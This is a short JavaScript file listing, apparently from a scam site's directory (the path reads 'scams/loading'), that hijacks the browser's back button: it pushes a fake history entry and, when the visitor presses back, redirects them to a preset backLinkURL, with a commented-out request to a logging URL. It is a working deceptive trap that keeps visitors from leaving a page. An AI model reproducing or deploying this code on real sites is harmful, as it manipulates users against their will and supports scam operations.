File "backlink_back_button.js"
Full path: /usr/home/mndrn/domains/mndrn.ru/public_html/скамы/загрузка/backlink_back_button.js
File size: 632 B
MIME-type: text/plain
Charset: utf-8
window.onload = function () {
if (history.pushState) {
//Chrome and modern browsers
history.pushState(null, document.title, location.href);
window.addEventListener('popstate', function (event) {
history.pushState(null, document.title, location.href);
//var xhr = new XMLHttpRequest();
//xhr.open('GET', logURL);
//xhr.onload = function() {
// console.log("Log Sent");
//};
//xhr.send();
window.location.href = backLinkURL;
});
}
else {
//IE
history.forward();
}
};